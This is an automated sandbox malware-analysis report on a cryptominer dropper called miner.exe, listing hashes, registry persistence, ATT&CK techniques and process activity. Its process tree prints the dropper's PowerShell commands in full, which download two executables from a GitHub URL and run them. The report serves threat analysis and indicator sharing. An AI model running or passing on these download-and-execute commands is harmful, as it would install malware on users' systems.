7cc35d1eb6961c962ae9fae96b4564c3f47d17b105af731910afe336f744f8ca

Analysis

max time kernel
48s
max time network
50s
platform
windows7_x64
resource
win7v20201028
submitted
18-01-2021 15:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

miner.exe
Size

17.2MB
MD5

adf909a4715a421cd8c683016e75d40a
SHA1

51f6dc871ec6bd0b8296e5d631287d425aa3270d
SHA256

138b049541b36ea37d12b9ef3f684aa5e99315e0ce5137e0bea89d39718faefe
SHA512

a2fff627245ad394fb68bc53f7b163b94b7dc950e23a6c3aedb14453cda858468f76aec32a74ba2034d169f69798b13a201b11cf939294690d7a16c7e3565073

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/7gds/f/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/7gds/f/main/miner.exe

Signatures

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

miner.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	miner.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	miner.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1524 powershell.exe
1524 powershell.exe
572 powershell.exe
572 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1524 powershell.exe
Token: SeDebugPrivilege 572 powershell.exe

pid	process
1524	powershell.exe
1524	powershell.exe
572	powershell.exe
572	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

miner.exe

description	pid	process	target process
PID 1964 wrote to memory of 1524	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 1524	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 1524	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 1524	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 572	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 572	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 572	1964	miner.exe	powershell.exe
PID 1964 wrote to memory of 572	1964	miner.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\miner.exe
"C:\Users\Admin\AppData\Local\Temp\miner.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/7gds/f/main/bild.exe,https://raw.githubusercontent.com/7gds/f/main/miner.exe -Destination Ga.exe,FZ.exe;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Start-Process Ga.exe; Start-Process FZ.exe;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c

MD5
c0e27af42e8ee2a65dd94077deab5d57

SHA1
d8484132d3cf6820c8bc01c9218c5d9987979430

SHA256
5da455a88cf42bab21dfb24a1e62c3eab395e76559b0639552b8dc873a671cc0

SHA512
478dbe92901e849a7af397325ab76c7261af0a1739d2762209517a356397038e33f7beb690233924672699741ce6a0e0a41fd40a17ee1c5dccae84a144b8dba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8

MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422

MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf

MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6

MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134

MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
6ce6ea8241a8ebe530ccb3781f560941

SHA1
7725bf36b0db269c86bb4958d6aeeb304d75b372

SHA256
b91ba8545be1a92c33513518d3c1c29eac2fdbb11b4fc36f97cfe8f1ab830869

SHA512
7f976b8512ed77f0a045efb5d4f6507ad2b5df2a4a63bfd4b4e782906c696aa2697a0d90a081389baf1147906a030bb8cf282bd044f653c8ab9f99bacbbe5c1e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
db9fddd4596e5c7d749ff18a5e3c795b

SHA1
9743201e78bdd1e6096528e99d7d4dc5823a1224

SHA256
593aa75c1d7be147d0eeb15fd9a43394a23f1ac2f0bc5392bfaa2fa7d90fa4ac

SHA512
ddc4890532c0791e36da2ec2b5bd73bbe4ff40b52d16686d2461d162f91cc13d6aa3b2a1af542399bb488f7f3a2a6cfed9334a5a27c5f398bafe2d284fdcb474

Download Submit
memory/572-27-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/572-32-0x0000000004A52000-0x0000000004A53000-memory.dmp

Filesize
4KB

Download
memory/572-58-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/572-57-0x0000000005950000-0x0000000005951000-memory.dmp

Filesize
4KB

Download
memory/572-56-0x0000000005940000-0x0000000005941000-memory.dmp

Filesize
4KB

Download
memory/572-44-0x0000000005870000-0x0000000005871000-memory.dmp

Filesize
4KB

Download
memory/572-41-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/572-23-0x0000000000000000-mapping.dmp

Download
memory/572-40-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/572-26-0x0000000073CA0000-0x000000007438E000-memory.dmp

Filesize
6.9MB

Download
memory/572-31-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/572-28-0x0000000004A90000-0x0000000004A91000-memory.dmp

Filesize
4KB

Download
memory/572-29-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/572-30-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/1524-10-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1524-4-0x0000000073CE0000-0x00000000743CE000-memory.dmp

Filesize
6.9MB

Download
memory/1524-9-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/1524-7-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/1524-8-0x0000000004932000-0x0000000004933000-memory.dmp

Filesize
4KB

Download
memory/1524-6-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/1524-5-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download
memory/1524-2-0x0000000000000000-mapping.dmp

Download
memory/1524-3-0x0000000075ED1000-0x0000000075ED3000-memory.dmp

Filesize
8KB

Download
memory/1524-13-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/1524-22-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/1524-21-0x0000000006170000-0x0000000006171000-memory.dmp

Filesize
4KB

Download
memory/1524-20-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1524-19-0x00000000061E0000-0x00000000061E1000-memory.dmp

Filesize
4KB

Download
memory/1524-18-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download